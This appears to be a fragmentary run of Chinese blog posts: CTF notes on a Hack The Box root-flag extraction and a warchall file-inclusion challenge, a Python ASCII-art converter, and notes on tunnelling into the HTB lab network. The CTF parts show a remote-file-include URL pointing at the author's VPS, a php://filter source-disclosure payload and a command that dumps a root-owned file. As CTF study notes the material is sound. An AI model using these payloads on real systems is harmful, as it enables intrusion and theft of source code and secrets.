Oc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==

解压：unzip backup.zip

1
2

Archive:  base.zip
   skipping: root.txt                need PK compat. v5.1 (can do v4.6)

并没有解压出来，于是： 发现需要密码，用之前的口令尝试一下啊，发现magicword可以解压成功。

然后就得到了root的flag……个P呀。

writeup看都看不懂为什么要这么做。总之加密解密这块，我的知识还很欠缺。总之，运行下面命令，就得到了root的flag。

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /r**t/r**t.txt | base64 -d > root.zip

————main.py |png.py |handleDocx.py

环境

python2+ 某些图像处理模块

题外

这个程序写了有两三个月了吧== 不过是断断续续地写的，收获有很多。 不过当时只顾着完成了，没有什么记录。

题目地址 如题目所提示，是PHP文件包含漏洞。 访问给出的题目地址，网页提示“网站正在建设中”

扫描目录

和所有web漏洞一样，先dirbuster扫描一下

test.php报错

require_once()语句在脚本执行期间包含并运行指定文件 /home/level/14_live_fi/www/test.php不是一个目录，然后报错了。

info1:网站所在目录路径： /home/level/14_live_fi/www/

猜解参数

猜测应该是远程文件包含remote file include，于是访问rfi.php发现页面是空白。

因为看不到源码，所以只能爆破试试。 发现cmd是可能的命令参数。 /temp/rfi.php?cmd=http://127.0.0.1:80/test.php 查看源代码，多了<pre></pre>这个字符串。

访问/temp/rfi.php?cmd=http://vps的ip:888/whale.php 远程文件包含似乎没有成功。

所以搞不懂cmd这个参数到底怎么用。

重新扫描

找不到线索，于是重新扫描

info2: 整理下已知网站目录 http://lfi.warchall.net/protected/ http://lfi.warchall.net/temp/

http://lfi.warchall.net/protected/logs/20180905_critical_details.txt 可以分析出，log目录下，记录了来自各地的尝试文件包含的攻击记录。 而这个攻击记录，则表明，文件包含使用的是require_once()这个函数 而漏洞指明了index.php 的第11行。

线索

于是我返回了index.php

现在考虑一下，题目意思是什么，本地文件包含通常会泄露敏感信息。 然后下一步就是找flag了吧

找不到flag所在的路径啊！好气

writeup

writeup 看了一些wp，发现解题思路是这样的：solution.php因为是脚本文件，所以客户端是不能直接查看的。

要通过以下协议，将php编码一下再查看。?lang=php://filter/convert.base64-encode/resource=solution.php"

按照wp，这道题其实坏了，得不出flag的。有点坑。

参考：

图片转字符画

BadApple视频转字符动画

依赖

python3 + PIL模块

程序分析

该程序可以定义生成字符画的类型（html、txt）、画的尺寸

pil的image类

1
2
3
4

pic = Image.open('路径') #创建一个类实例
x,y = pic.size
out = pic.resize((x,y),Image.NEAREST) 
out.save("C:\Users\whale\Desktop\2.jpg")

上述代码，打开了一个图片a，获取了a的尺寸，并且以该尺寸另存为2.jpg。

如果在第一行加上 pic = Image.open('路径').convert('L') 那么保存的2.jpg就是灰度模式。一般都是RGB模式，学过绘画的都知道，三原色（red,green,blue）只要三种颜色，就可以调出任何其他颜色，黑色白色不算。 em…懒得写了，直接

源码

视频转png图片

png图片转txt

批量转换为txt

播放脚本：

1
2
3
4
5
6

#!/bin/bash
for i in $(seq 1 483)  
do
cat /root/Desktop/txt/$i.txt
sleep 0.1
done

效果

忧伤，水平还是这么菜

问题一，无法访问htb内网

？要怎样配置，才能让kali虚拟机访问htb内网。

相关（也许不相关）知识点：

• 端口转发，也可以叫静态端口映射你必须将你的服务端的内网ip的端口转发到外网才能访问，这就是端口转发。

• 动态端口映射（NAT，网络地址转换），两个主机，将a主机的1端口映射到b主机的1端口。于是访问b:1就等于访问a:1。

• 静态和动态端口映射的区别，当连接关闭后，内网和公网端口的映射就关闭了，这叫做动态端口映射。而静态端口映射，不管有无连接，端口映射关系都是固定的。

• shadowsocks代理：将一台服务器配置为ss代理服务器，然后客户端用口令等信息通过secure socket 5协议登陆，达到了通过代理访问网络的目的。

• 反向代理与正向代理：

反向代理，简而言之，就是一个服务端的负载均衡器

假如有很多很多客户端，由一个服务器处理不过来，那好，你说，那我多加几个服务器不就行了？又有一个问题，客户端来访问时候，到底访问哪个服务器？

呃，这就需要一个代理，将客户端的请求通过代理，发送到不同的服务器上去（有效的分流了请求，使单个服务器的压力不会太大）

一般用nginx作为反向代理的服务器。我的Linux里的nginx的路径是/etc/nginx，nginx.conf 是服务器的配置文件，用 -t 可以检查设置是否有误

实验一，kali and vps连通性

原因是，kali虚拟机是nat模式，通过物理机上网。kali的包通过物理机公网ip发出，vps连接kali，只能找到物理机。

实验二，端口转发

参考资料:内网端口转发 目的：绑定kali:2333和vps:22端口，因为vps能访问htb内网，kali不能，所以期望vps能代替我们将数据取回。

1
2

（kali虚拟机）#ssh -2 -D 2333 root@(vps的ip)
输入密码连接成功

将浏览器设置代理，监听127.0.0.1：2333，然后访问内网ip：80。

我还以为失败了，然后重新测试了一下。 配置proxychains监听127.0.0.1：2333，然后用nmap扫描，发现扫描内网主机存在，确认端口转发成功。

浏览器访问失败原因可能是：vps是通过vpn访问的htb内网，vpn将数据加密了，不允许数据包再重新转发到其他机器。

所以我们想用kali连htb内网，不能间接通过vps转发，只能用kali的openvpn直接连接。

实验三，windows连接openvpn

下载了openvpn，windows版本。 但是怎么都连不上。 查log，查ovpn文件。。。。最后发现

只可能是伟大的墙干的了。。。 终于找到问题的根源了，愁死我了==

有两个解决办法

• vultr的服务器重新装系统，系统换为kali的。好处是免费，墙外直接操作扫描速度等很快，坏处是复杂，虽然不难，但是要整也是很多事要做。
• 买htb的vip，每个月10英镑，折合90块左右。 然后切换到vip服务器，选择很多，肯定有没被墙的主机。

问题二，vmware鼠标失灵

方法一：先重装vmtools无效

方法二：vmware面板——帮助——软件更新——检查更新——获取更多信息——download now 更新vmware到15版本，成功

问题三，nat模式还是上不了网

虚拟网络编辑器——还原默认设置——确认 虚拟机重新启动